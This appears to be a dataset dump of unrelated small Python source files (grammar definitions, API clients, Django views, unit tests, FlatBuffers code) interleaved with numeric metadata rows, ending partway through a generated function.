from context_free_grammar import Context_Free_Grammar def Grammar(): grammar = Context_Free_Grammar() grammar.add_terminal('+', '*', '(', ')', 'id') grammar.add_non_terminal('E', 'T', 'F') grammar.set_start_symbol('E') grammar.add_production_rule('E', ['E', '+', 'T'], ['T']) grammar.add_production_rule('T', ['T', '*', 'F'], ['F']) grammar.add_production_rule('F', ['(', 'E', ')'], ['id']) return grammar
23.611111
58
0.614118
55
425
4.436364
0.345455
0.204918
0.221311
0.295082
0
0
0
0
0
0
0
0
0.127059
425
17
59
25
0.657682
0
0
0
0
0
0.061321
0
0
0
0
0
0
1
0.1
false
0
0.1
0
0.3
0
0
0
0
null
1
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
9658362fa7fbb40495ffba85d37c4d7bab283af2
64
py
Python
scripts/download/download.py
GalAster/Twossoms
5011c07d4662c3b81d433fc8b6d076b0b17ed0d8
[ "CC0-1.0" ]
1
2019-03-01T00:48:05.000Z
2019-03-01T00:48:05.000Z
scripts/download/download.py
GalAster/Twossoms
5011c07d4662c3b81d433fc8b6d076b0b17ed0d8
[ "CC0-1.0" ]
null
null
null
scripts/download/download.py
GalAster/Twossoms
5011c07d4662c3b81d433fc8b6d076b0b17ed0d8
[ "CC0-1.0" ]
null
null
null
latest = "https://github.com/GalAster/Twossoms/releases/latest"
32
63
0.78125
8
64
6.25
0.875
0
0
0
0
0
0
0
0
0
0
0
0.046875
64
1
64
64
0.819672
0
0
0
0
0
0.8125
0
0
0
0
0
0
1
0
false
0
0
0
0
0
1
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
1
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
965ddeadff84d31e57ad97652f59a52dfdc38abf
507
py
Python
app.py
rcmachado/cookiecutter-search
d7c9ebd931f6b93c3d0d3b05d2478be797404d7a
[ "MIT" ]
null
null
null
app.py
rcmachado/cookiecutter-search
d7c9ebd931f6b93c3d0d3b05d2478be797404d7a
[ "MIT" ]
null
null
null
app.py
rcmachado/cookiecutter-search
d7c9ebd931f6b93c3d0d3b05d2478be797404d7a
[ "MIT" ]
null
null
null
# coding: utf-8 from tornado.ioloop import IOLoop from cookiecutter_search import config from cookiecutter_search.application import MainApplication from cookiecutter_search.urls import urlpatterns if __name__ == '__main__': app_config = { 'debug': config.DEBUG, 'static_path': 'cookiecutter_search/static/', 'template_path': 'cookiecutter_search/templates/' } app = MainApplication(urlpatterns, **app_config) app.listen(config.PORT) IOLoop.instance().start()
28.166667
59
0.731755
55
507
6.436364
0.490909
0.254237
0.186441
0
0
0
0
0
0
0
0
0.002375
0.169625
507
17
60
29.823529
0.83848
0.025641
0
0
0
0
0.191057
0.115854
0
0
0
0
0
1
0
false
0
0.307692
0
0.307692
0
0
0
0
null
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
3
9676e04f5a6786894f0d159d0af1bd9c0483d35a
457
py
Python
pyro/contrib/gp/models/__init__.py
cweniger/pyro
ba104f07ca17865d2600e8765d920d549fcb3fbc
[ "MIT" ]
10
2020-03-18T14:41:25.000Z
2021-07-04T08:49:57.000Z
pyro/contrib/gp/models/__init__.py
cweniger/pyro
ba104f07ca17865d2600e8765d920d549fcb3fbc
[ "MIT" ]
19
2018-10-30T13:45:31.000Z
2019-09-27T14:16:57.000Z
pyro/contrib/gp/models/__init__.py
cweniger/pyro
ba104f07ca17865d2600e8765d920d549fcb3fbc
[ "MIT" ]
5
2020-06-21T23:40:35.000Z
2021-11-09T16:18:42.000Z
from pyro.contrib.gp.models.gplvm import GPLVM from pyro.contrib.gp.models.gpr import GPRegression from pyro.contrib.gp.models.model import GPModel from pyro.contrib.gp.models.sgpr import SparseGPRegression from pyro.contrib.gp.models.vgp import VariationalGP from pyro.contrib.gp.models.vsgp import VariationalSparseGP __all__ = [ "GPLVM", "GPModel", "GPRegression", "SparseGPRegression", "VariationalGP", "VariationalSparseGP", ]
28.5625
59
0.772429
55
457
6.345455
0.327273
0.137536
0.25788
0.292264
0.395415
0
0
0
0
0
0
0
0.129103
457
15
60
30.466667
0.876884
0
0
0
0
0
0.161926
0
0
0
0
0
0
1
0
false
0
0.428571
0
0.428571
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
3
9676e31827673fb81102a3d1c887cab0cd874307
1,028
py
Python
Section_5/Exercise_06.py
Szymon-Budziak/WDI_exercises_solutions
51ffc9ec8b3cd6809bd55e98ecb8aed759c2d460
[ "MIT" ]
null
null
null
Section_5/Exercise_06.py
Szymon-Budziak/WDI_exercises_solutions
51ffc9ec8b3cd6809bd55e98ecb8aed759c2d460
[ "MIT" ]
null
null
null
Section_5/Exercise_06.py
Szymon-Budziak/WDI_exercises_solutions
51ffc9ec8b3cd6809bd55e98ecb8aed759c2d460
[ "MIT" ]
1
2021-11-21T09:38:33.000Z
2021-11-21T09:38:33.000Z
""" Liczby zespolone są reprezentowane przez krotkę (re, im). Gdzie: re - część rzeczywista liczby, im - część urojona liczby. Proszę napisać podstawowe operacje na liczbach zespolonych, m.in. dodawanie, odejmowanie, mnożenie, dzielenie, potęgowanie, wypisywanie i wczytywanie. """ from math import sqrt, cos, sin def addition(a, b): return (a[0] + b[0], a[1] + b[1]) def subtraction(a, b): return (a[0] - b[0], a[1] - b[1]) def multiplication(a, b): return (a[0] * b[0] - a[1] * b[1], a[0] * b[1] + a[1] * b[0]) def division(a, b): return ((a[0] * b[0] + a[1] * b[1]) / (b[0] ** 2 + b[1] ** 2), (a[1] * b[0] - a[0] * b[1]) / (b[0] ** 2 + b[1] ** 2)) def power(a, n): z = sqrt(a[0] ** 2 + a[1] ** 2) cosx = a[0] / z angel = sin(cosx) return ((z ** n) * cos(n * angel), (z ** n) * sin(n * angel)) # enter complex number by typing x+yj e.g. 4+6j def complex_number_input(): re, im = tuple(map(int, input().split("+i"))) return re, im print(complex_number_input())
25.7
95
0.560311
180
1,028
3.177778
0.377778
0.027972
0.031469
0.062937
0.146853
0.146853
0.146853
0.146853
0.122378
0.122378
0
0.049242
0.229572
1,028
39
96
26.358974
0.67298
0.311284
0
0
0
0
0.002857
0
0
0
0
0
0
1
0.315789
false
0
0.052632
0.210526
0.684211
0.052632
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
3
9692b34f2b5cf59a715c085a492483a181531406
1,018
py
Python
tests/test_articles.py
koyoo-maxwel/highlights
9f551c64f7d1be440117d3f843f0f0671caf03f4
[ "MIT" ]
null
null
null
tests/test_articles.py
koyoo-maxwel/highlights
9f551c64f7d1be440117d3f843f0f0671caf03f4
[ "MIT" ]
null
null
null
tests/test_articles.py
koyoo-maxwel/highlights
9f551c64f7d1be440117d3f843f0f0671caf03f4
[ "MIT" ]
null
null
null
import unittest from app.models import Articles class TestArticles(unittest.TestCase): ''' Test class to test the behavior of the articles class ''' def setUp(self): ''' Test class to run before other tests ''' self.new_article = Articles('koyoo','sales is advanced','the marketing industry is realy transforming verry fast', 'https://google.com','https://google.com/images','2015-01-10T36:20:07Z') def test_instance(self): self.assertTrue(isinstance(self.new_article,Articles)) def test_to_check_instance_variables(self): self.assertEquals(self.new_article.author,'koyoo') self.assertEquals(self.new_article.title,'sales is advanced') self.assertEquals(self.new_article.description,'the marketing industry is realy transforming verry fast') self.assertEquals(self.new_article.url,'https://google.com') self.assertEquals(self.new_article.urlToImage,'https://google.com/images')
40.72
122
0.68664
126
1,018
5.452381
0.420635
0.071325
0.142649
0.167394
0.358079
0.139738
0.139738
0.139738
0
0
0
0.017178
0.199411
1,018
25
123
40.72
0.825767
0.088409
0
0
0
0
0.292135
0
0
0
0
0
0.428571
1
0.214286
false
0
0.142857
0
0.428571
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
1
0
1
0
0
0
0
0
0
0
3
96a09075f26029c812a08fc6172cd3271eeb2071
1,073
py
Python
tests/v1/test_logs_status_remapper.py
MichaelTROEHLER/datadog-api-client-python
12c46626622fb1277bb1e172753b342c671348bd
[ "Apache-2.0" ]
null
null
null
tests/v1/test_logs_status_remapper.py
MichaelTROEHLER/datadog-api-client-python
12c46626622fb1277bb1e172753b342c671348bd
[ "Apache-2.0" ]
null
null
null
tests/v1/test_logs_status_remapper.py
MichaelTROEHLER/datadog-api-client-python
12c46626622fb1277bb1e172753b342c671348bd
[ "Apache-2.0" ]
null
null
null
# coding: utf-8 # Unless explicitly stated otherwise all files in this repository are licensed under the Apache-2.0 License. # This product includes software developed at Datadog (https://www.datadoghq.com/). # Copyright 2019-Present Datadog, Inc. from __future__ import absolute_import import sys import unittest import datadog_api_client.v1 try: from datadog_api_client.v1.model import logs_status_remapper_type except ImportError: logs_status_remapper_type = sys.modules[ 'datadog_api_client.v1.model.logs_status_remapper_type'] from datadog_api_client.v1.model.logs_status_remapper import LogsStatusRemapper class TestLogsStatusRemapper(unittest.TestCase): """LogsStatusRemapper unit test stubs""" def setUp(self): pass def tearDown(self): pass def testLogsStatusRemapper(self): """Test LogsStatusRemapper""" # FIXME: construct object with mandatory attributes with example values # model = LogsStatusRemapper() # noqa: E501 pass if __name__ == '__main__': unittest.main()
27.512821
108
0.746505
130
1,073
5.915385
0.592308
0.052016
0.083225
0.093628
0.146944
0.146944
0.106632
0.106632
0
0
0
0.015909
0.17987
1,073
38
109
28.236842
0.857955
0.383038
0
0.157895
0
0
0.094574
0.082171
0
0
0
0.026316
0
1
0.157895
false
0.157895
0.368421
0
0.578947
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
1
1
0
0
0
0
3
96b2b6c8dc9b4ec999de72b5e023045243717609
218
py
Python
custom_components/carson/const.py
rado0x54/ha-carson-living
b3be3f9608b60e4023829f7f055719f1c13cbcd8
[ "MIT" ]
1
2020-11-23T19:36:27.000Z
2020-11-23T19:36:27.000Z
custom_components/carson/const.py
rado0x54/ha-carson-living
b3be3f9608b60e4023829f7f055719f1c13cbcd8
[ "MIT" ]
2
2020-11-23T21:33:16.000Z
2020-11-23T22:54:28.000Z
custom_components/carson/const.py
rado0x54/ha-carson-living
b3be3f9608b60e4023829f7f055719f1c13cbcd8
[ "MIT" ]
null
null
null
"""Constants for the Carson integration.""" DOMAIN = "carson" UNLOCKED_TIMESPAN_SEC = 5 ATTRIBUTION = "provided by Eagle Eye" CONF_LIST_FROM_EAGLE_EYE = "list_from_eagle_eye" DEFAULT_CONF_LIST_FROM_EAGLE_EYE = False
24.222222
48
0.802752
32
218
5.03125
0.625
0.198758
0.242236
0.298137
0.248447
0
0
0
0
0
0
0.005181
0.114679
218
8
49
27.25
0.829016
0.169725
0
0
0
0
0.262857
0
0
0
0
0
0
1
0
false
0
0
0
0
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
3
7365f7ff5b9a151f031af210ef1f64784f2994fe
534
py
Python
vk_channelify/vk_errors.py
reo7sp/vk-channelify
06e513d8aef456bc91b927102d542fb444cf8502
[ "MIT" ]
21
2017-05-01T11:25:59.000Z
2022-03-01T20:10:15.000Z
vk_channelify/vk_errors.py
reo7sp/vk-channelify
06e513d8aef456bc91b927102d542fb444cf8502
[ "MIT" ]
6
2017-05-06T01:55:30.000Z
2018-06-27T20:00:26.000Z
vk_channelify/vk_errors.py
reo7sp/vk-channelify
06e513d8aef456bc91b927102d542fb444cf8502
[ "MIT" ]
3
2017-05-30T12:13:41.000Z
2018-03-17T18:18:46.000Z
class VkError(Exception): def __init__(self, code, message, request_params): super(VkError, self).__init__() self.code = code self.message = message self.request_params = request_params def __str__(self): return 'VkError {}: {} (request_params: {})'.format(self.code, self.message, self.request_params) class VkWallAccessDeniedError(VkError): def __init__(self, code, message, request_params): super(VkWallAccessDeniedError, self).__init__(code, message, request_params)
35.6
105
0.694757
58
534
5.931034
0.258621
0.264535
0.104651
0.209302
0.232558
0.232558
0.232558
0.232558
0
0
0
0
0.191011
534
14
106
38.142857
0.796296
0
0
0.181818
0
0
0.065543
0
0
0
0
0
0
1
0.272727
false
0
0
0.090909
0.545455
0
0
0
0
null
1
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
3
737c2561ba89ca6632acd0136d14057de7d2cc6c
3,665
py
Python
pygrocydm/grocy_datamanager.py
fossabot/pygrocydm
6da0c1eda19c6059941440465ac815cead2760b3
[ "MIT" ]
null
null
null
pygrocydm/grocy_datamanager.py
fossabot/pygrocydm
6da0c1eda19c6059941440465ac815cead2760b3
[ "MIT" ]
null
null
null
pygrocydm/grocy_datamanager.py
fossabot/pygrocydm
6da0c1eda19c6059941440465ac815cead2760b3
[ "MIT" ]
null
null
null
from .battery import BATTERIES_ENDPOINT, Battery from .chore import CHORES_ENDPOINT, Chore from .equipment import EQUIPMENT_ENDPOINT, Equipment from .grocy_api_client import (DEFAULT_PORT_NUMBER, GrocyApiClient, GrocyEntityList) from .location import LOCATION_ENDPOINT, Location from .product import PRODUCTS_ENDPOINT, Product from .product_group import PRODUCT_GROUPS_ENDPOINT, ProductGroup from .quantity_unit import QUANTITY_UNITS_ENDPOINT, QuantityUnit from .quantity_unit_conversion import (QUANTITY_UNIT_CONVERTIONS_ENDPOINT, QuantityUnitConversion) from .shopping_list import (SHOPPING_LIST_ENDPOINT, SHOPPING_LISTS_ENDPOINT, ShoppingList, ShoppingListItem) from .task import TASKS_ENDPOINT, Task from .task_category import TASK_CATEGORIES_ENDPOINT, TaskCategory from .userentity import USERENTITIES_ENDPOINT, UserEntity from .userfield import USERFIELDS_ENDPOINT, Userfield from .userobject import USEROBJECTS_ENDPOINT, UserObject class GrocyDataManager(): """ Main class, Handles Generic Entities from Grocy """ def __init__( self, base_url, api_key, port: int = DEFAULT_PORT_NUMBER, verify_ssl=True): """ Constructor requiring base url and API key :param base_url: Grocy server url :param api_key: Grocy API key """ self.__api = GrocyApiClient(base_url, api_key, port, verify_ssl) def products(self) -> GrocyEntityList: cls = Product return GrocyEntityList(self.__api, cls, PRODUCTS_ENDPOINT) def chores(self) -> GrocyEntityList: cls = Chore return GrocyEntityList(self.__api, cls, CHORES_ENDPOINT) def locations(self) -> GrocyEntityList: cls = Location return GrocyEntityList(self.__api, cls, LOCATION_ENDPOINT) def batteries(self) -> GrocyEntityList: cls = Battery return GrocyEntityList(self.__api, cls, BATTERIES_ENDPOINT) def shopping_list(self) -> GrocyEntityList: cls = ShoppingListItem return GrocyEntityList(self.__api, cls, SHOPPING_LIST_ENDPOINT) def shopping_lists(self) -> GrocyEntityList: cls = ShoppingList return GrocyEntityList(self.__api, cls, SHOPPING_LISTS_ENDPOINT) def quantity_unit_conversions(self) -> GrocyEntityList: cls = QuantityUnitConversion return GrocyEntityList( self.__api, cls, QUANTITY_UNIT_CONVERTIONS_ENDPOINT) def quantity_units(self) -> GrocyEntityList: cls = QuantityUnit return GrocyEntityList(self.__api, cls, QUANTITY_UNITS_ENDPOINT) def tasks(self) -> GrocyEntityList: cls = Task return GrocyEntityList(self.__api, cls, TASKS_ENDPOINT) def task_categories(self) -> GrocyEntityList: cls = TaskCategory return GrocyEntityList(self.__api, cls, TASK_CATEGORIES_ENDPOINT) def product_groups(self) -> GrocyEntityList: cls = ProductGroup return GrocyEntityList(self.__api, cls, PRODUCT_GROUPS_ENDPOINT) def equipment(self) -> GrocyEntityList: cls = Equipment return GrocyEntityList(self.__api, cls, EQUIPMENT_ENDPOINT) def userfields(self) -> GrocyEntityList: cls = Userfield return GrocyEntityList(self.__api, cls, USERFIELDS_ENDPOINT) def userentities(self) -> GrocyEntityList: cls = UserEntity return GrocyEntityList(self.__api, cls, USERENTITIES_ENDPOINT) def userobjects(self) -> GrocyEntityList: cls = UserObject return GrocyEntityList(self.__api, cls, USEROBJECTS_ENDPOINT)
37.783505
76
0.708868
372
3,665
6.696237
0.188172
0.044962
0.132477
0.168607
0.213167
0.062625
0
0
0
0
0
0
0.225375
3,665
96
77
38.177083
0.877422
0.042292
0
0
0
0
0
0
0
0
0
0
0
1
0.228571
false
0
0.214286
0
0.671429
0
0
0
0
null
0
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
1
0
0
3
7388a2b391edec8068c5c3fd3a45519283bf30d5
837
py
Python
user-test.py
Barrack-coder/Password-locker
a4edde929971537d5126e3140766f843676abf43
[ "MIT" ]
null
null
null
user-test.py
Barrack-coder/Password-locker
a4edde929971537d5126e3140766f843676abf43
[ "MIT" ]
null
null
null
user-test.py
Barrack-coder/Password-locker
a4edde929971537d5126e3140766f843676abf43
[ "MIT" ]
null
null
null
# import unittest # from user import user # from user import credentials # class TestClass(unittest.TestCase): # def setUp(self): # self.new_user= user("Barry", "Barry@1234") # def test_init(self): # self.assertEqual =(self.newName,"Barry") # self.assertEqual =(self.newName,"Barry@1234") # def test_save_user(self): # self.new_user.save_user() # self.assertEqual (len(user.user_list),1) # class TestClass(unittest.TestCase): # def setUp(self): # self.assertEqual = (self.new_credentials.user,"Barry") # self.assertEqual = (self.new_credentials.account,"email") # self.assertEqual = (self.new_credentials.password,"Barry@1234")
36.391304
81
0.557945
85
837
5.376471
0.294118
0.196937
0.207877
0.14442
0.544858
0.201313
0.201313
0.201313
0
0
0
0.022807
0.318996
837
23
82
36.391304
0.778947
0.899642
0
null
0
null
0
0
null
0
0
0
null
1
null
true
0
0
null
null
null
0
0
0
null
0
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
null
0
0
0
0
0
0
1
0
0
0
0
0
0
3
739754ff58ed0aa91372fae8a1ffa65d260feec8
2,254
py
Python
tensorflow_federated/python/core/backends/xla/execution_contexts.py
zhihansh/federated-oss
38cfcb05702ff7297db76d3ccb5f5afef53ca09b
[ "Apache-2.0" ]
1,918
2019-02-22T21:17:28.000Z
2022-03-30T14:49:53.000Z
tensorflow_federated/python/core/backends/xla/execution_contexts.py
zhihansh/federated-oss
38cfcb05702ff7297db76d3ccb5f5afef53ca09b
[ "Apache-2.0" ]
999
2019-02-22T21:47:44.000Z
2022-03-31T11:06:42.000Z
tensorflow_federated/python/core/backends/xla/execution_contexts.py
zhihansh/federated-oss
38cfcb05702ff7297db76d3ccb5f5afef53ca09b
[ "Apache-2.0" ]
498
2019-02-22T21:17:56.000Z
2022-03-29T02:54:15.000Z
# Copyright 2020, The TensorFlow Federated Authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Execution contexts for the XLA backend.""" from tensorflow_federated.python.core.backends.xla import compiler from tensorflow_federated.python.core.backends.xla import executor from tensorflow_federated.python.core.impl.context_stack import context_stack_impl from tensorflow_federated.python.core.impl.execution_contexts import sync_execution_context from tensorflow_federated.python.core.impl.executors import executor_stacks def create_local_python_execution_context(): """Creates an XLA-based local execution context. NOTE: This context is only directly backed by an XLA executor. It does not support any intrinsics, lambda expressions, etc. Returns: An instance of `execution_context.ExecutionContext` backed by XLA executor. """ # TODO(b/175888145): Extend this into a complete local executor stack. factory = executor_stacks.local_executor_factory( support_sequence_ops=True, leaf_executor_fn=executor.XlaExecutor, local_computation_factory=compiler.XlaComputationFactory()) return sync_execution_context.ExecutionContext(executor_fn=factory) def set_local_python_execution_context(*args, **kwargs): """Sets an XLA-based local execution context. Invokes `create_local_execution_context` to contruct an execution context, and sets it as the default. Accepts the same parameters as `create_local_execution_context`. Args: *args: Positional args for `create_local_execution_context`. **kwargs: Keyword args for `create_local_execution_context`. """ context = create_local_python_execution_context(*args, **kwargs) context_stack_impl.context_stack.set_default_context(context)
41.740741
91
0.797693
307
2,254
5.680782
0.416938
0.119266
0.072248
0.083142
0.260321
0.237959
0.057339
0.057339
0
0
0
0.008705
0.13354
2,254
53
92
42.528302
0.884281
0.570541
0
0
0
0
0
0
0
0
0
0.018868
0
1
0.142857
false
0
0.357143
0
0.571429
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
1
0
0
0
0
0
1
0
1
0
0
3
73a1d4768f532c0e3d7d03bc69cb0e17b25c07bb
1,939
py
Python
LINEZX/Api/shop.py
HelloTan/linezx
40f4c15b8cfb8de52aa837db5831dac4947adb9a
[ "MIT" ]
2
2018-07-20T12:55:45.000Z
2018-08-15T14:55:45.000Z
LINEZX/Api/shop.py
HelloTan/linezx
40f4c15b8cfb8de52aa837db5831dac4947adb9a
[ "MIT" ]
null
null
null
LINEZX/Api/shop.py
HelloTan/linezx
40f4c15b8cfb8de52aa837db5831dac4947adb9a
[ "MIT" ]
1
2018-07-07T10:06:01.000Z
2018-07-07T10:06:01.000Z
# -*- coding: utf-8 -*- from thrift.transport import THttpClient from thrift.protocol import TCompactProtocol from .config import Config from akad import ShopService from akad.ttypes import * class Shop(Config): client = None def __init__(self, authToken): Config.__init__(self) self.transport = THttpClient.THttpClient(self.LINE_HOST_DOMAIN, None, self.LINE_API_QUERY_PATH_FIR) self.transport.path = self.LINE_AUTH_QUERY_PATH self.transport.setCustomHeaders({ "X-Line-Application" : self.APP_NAME, "User-Agent" : self.USER_AGENT, "X-Line-Access": authToken }) self.protocol = TCompactProtocol.TCompactProtocol(self.transport); self.client = ShopService.Client(self.protocol) self.transport.path = self.LINE_SHOP_QUERY_PATH self.transport.open() def getProduct(self, packageID, language='ID', country='ID'): return self.client.getProduct(packageID, language, country) def getActivePurchases(self, start, size, language='ID', country='ID'): return self.client.getNewlyReleasedPackages(start, size, language, country) def getDownloads(self, start=0, size=1000, language='ID', country='ID'): return self.client.getDownloads(start, size, language, country) def getCoinProducts(self, appStoreCode, country="ID", language="ID"): return self.client.getCoinProducts(appStoreCode, country, language) def getEventPackages(self, start, size, language='ID', country='ID'): return self.client.getEventPackages(start, size, language, country) def getPopularPackages(self, start, size, language='ID', country='ID'): return self.client.getPopularPackages(start, size, language, country) def notifyDownloaded(self, packageId, language='ID'): return self.client.notifyDownloaded(packageId, language)
43.088889
108
0.689531
213
1,939
6.173709
0.267606
0.060837
0.063878
0.095817
0.322433
0.162738
0.162738
0.109506
0.109506
0.109506
0
0.003868
0.200103
1,939
44
109
44.068182
0.843972
0.01083
0
0
0
0
0.035791
0
0
0
0
0
0
1
0.235294
false
0
0.147059
0.205882
0.647059
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
1
1
0
0
3
73a7fc1f2e13b1dc725aebbab60c24130260a362
2,090
py
Python
lingcod/studyregion/views.py
google-code-export/marinemap
b7d58db11720637845b6a83bf70435c32c5af531
[ "BSD-3-Clause" ]
3
2017-06-09T20:44:58.000Z
2017-12-26T12:09:21.000Z
lingcod/studyregion/views.py
underbluewaters/marinemap
c001e16615caa2178c65ca0684e1b6fd56d3f93d
[ "BSD-3-Clause" ]
null
null
null
lingcod/studyregion/views.py
underbluewaters/marinemap
c001e16615caa2178c65ca0684e1b6fd56d3f93d
[ "BSD-3-Clause" ]
3
2016-11-30T13:41:56.000Z
2019-05-07T17:07:12.000Z
from django.http import HttpResponse, HttpResponseRedirect, HttpResponseBadRequest, HttpResponseServerError, HttpResponseForbidden from django.template import RequestContext from django.shortcuts import get_object_or_404, render_to_response from lingcod.common import default_mimetypes as mimetypes from lingcod.common.utils import KmlWrap from django.core.urlresolvers import reverse from django.conf import settings from lingcod.studyregion import models from django.views.decorators.cache import cache_page def studyregion(request, template_name='studyregion/studyregion.html'): """Main application window """ return render_to_response(template_name, RequestContext(request,{'api_key':settings.GOOGLE_API_KEY})) def show(request, pk): """Display a map with the study region geometry. """ return render_to_response('studyregion/show.html', RequestContext(request,{'api_key':settings.GOOGLE_API_KEY, 'pk': pk})) def kml(request, pk): """Return kml for the requested StudyRegion """ region = get_object_or_404(models.StudyRegion, pk=pk) return HttpResponse( KmlWrap( region.kml(request.get_host()) ), content_type=mimetypes.KML) @cache_page(60 * 60 * 24) def regionKml(request): """Handler for AJAX regionKml request """ region = models.StudyRegion.objects.current() return HttpResponse( KmlWrap( region.kml(request.get_host()) ), content_type=mimetypes.KML) def regionKmlChunk(request, n, s, e, w): """Handler for AJAX regionKml request """ region = models.StudyRegion.objects.current() return HttpResponse( KmlWrap( '<Document>' + region.kml_chunk(float(n), float(s), float(e), float(w)) + '</Document>' ), content_type=mimetypes.KML) def regionLookAtKml(request): """Handler for AJAX regionLookAtKml request """ region = models.StudyRegion.objects.current() return HttpResponse( KmlWrap( '<Document>' + region.lookAtKml() + '</Document>' ), content_type=mimetypes.KML )
39.433962
137
0.711005
239
2,090
6.09205
0.338912
0.041209
0.068681
0.063187
0.384615
0.337912
0.337912
0.337912
0.273352
0.273352
0
0.007013
0.18134
2,090
52
138
40.192308
0.843951
0.117703
0
0.185185
0
0
0.060934
0.027904
0
0
0
0
0
1
0.222222
false
0
0.333333
0
0.777778
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
1
0
1
0
0
3
73a9ec1decac7bc2900d6ef88325ceefa8ff5617
539
py
Python
lib/exceptions.py
yiayiao/taobao_auto_buy
389efe48acad6a3b16ae2a107bb417489f12f624
[ "Apache-2.0" ]
75
2020-01-08T22:51:44.000Z
2021-08-22T22:38:16.000Z
lib/exceptions.py
yiayiao/taobao_auto_buy
389efe48acad6a3b16ae2a107bb417489f12f624
[ "Apache-2.0" ]
10
2020-02-04T10:48:52.000Z
2021-06-22T03:33:32.000Z
lib/exceptions.py
yiayiao/taobao_auto_buy
389efe48acad6a3b16ae2a107bb417489f12f624
[ "Apache-2.0" ]
30
2020-02-19T13:48:35.000Z
2021-07-15T22:59:16.000Z
class SystemUnsupported(Exception): def __init__(self): message = "不支持您的系统" super().__init__(message) class SubClassInvaild(Exception): def __init__(self): message = "SubClass didn't provide needed function" super().__init__(message) class InvalidInputUrl(Exception): def __init__(self): message = "商品链接无效, 请检查后重试" super().__init__(message) class InvalidInputTime(Exception): def __init__(self): message = "抢购时间无效, 请按照格式重新输入" super().__init__(message)
22.458333
59
0.658627
51
539
6.333333
0.431373
0.148607
0.198142
0.247678
0.334365
0
0
0
0
0
0
0
0.231911
539
23
60
23.434783
0.780193
0
0
0.5
0
0
0.142857
0
0
0
0
0
0
1
0.25
false
0
0
0
0.5
0
0
0
0
null
0
1
1
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
1
0
0
0
0
0
0
0
3
73c19314d6e4d13b386c12724384759236a9077d
2,243
py
Python
lemon/protocol/Image/CdnImageFetchResp.py
lemon-chat/lemon-server-python
5947b52b3c4535ae54fe2705a830db07fdaf741d
[ "MIT" ]
null
null
null
lemon/protocol/Image/CdnImageFetchResp.py
lemon-chat/lemon-server-python
5947b52b3c4535ae54fe2705a830db07fdaf741d
[ "MIT" ]
null
null
null
lemon/protocol/Image/CdnImageFetchResp.py
lemon-chat/lemon-server-python
5947b52b3c4535ae54fe2705a830db07fdaf741d
[ "MIT" ]
null
null
null
# automatically generated by the FlatBuffers compiler, do not modify # namespace: Image import flatbuffers from flatbuffers.compat import import_numpy np = import_numpy() class CdnImageFetchResp(object): __slots__ = ['_tab'] @classmethod def GetRootAsCdnImageFetchResp(cls, buf, offset): n = flatbuffers.encode.Get(flatbuffers.packer.uoffset, buf, offset) x = CdnImageFetchResp() x.Init(buf, n + offset) return x # CdnImageFetchResp def Init(self, buf, pos): self._tab = flatbuffers.table.Table(buf, pos) # CdnImageFetchResp def Status(self): o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(4)) if o != 0: return self._tab.Get(flatbuffers.number_types.Uint8Flags, o + self._tab.Pos) return 0 # CdnImageFetchResp def Content(self, j): o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(6)) if o != 0: a = self._tab.Vector(o) return self._tab.Get(flatbuffers.number_types.Uint8Flags, a + flatbuffers.number_types.UOffsetTFlags.py_type(j * 1)) return 0 # CdnImageFetchResp def ContentAsNumpy(self): o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(6)) if o != 0: return self._tab.GetVectorAsNumpy(flatbuffers.number_types.Uint8Flags, o) return 0 # CdnImageFetchResp def ContentLength(self): o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(6)) if o != 0: return self._tab.VectorLen(o) return 0 # CdnImageFetchResp def ContentIsNone(self): o = flatbuffers.number_types.UOffsetTFlags.py_type(self._tab.Offset(6)) return o == 0 def CdnImageFetchRespStart(builder): builder.StartObject(2) def CdnImageFetchRespAddStatus(builder, status): builder.PrependUint8Slot(0, status, 0) def CdnImageFetchRespAddContent(builder, content): builder.PrependUOffsetTRelativeSlot(1, flatbuffers.number_types.UOffsetTFlags.py_type(content), 0) def CdnImageFetchRespStartContentVector(builder, numElems): 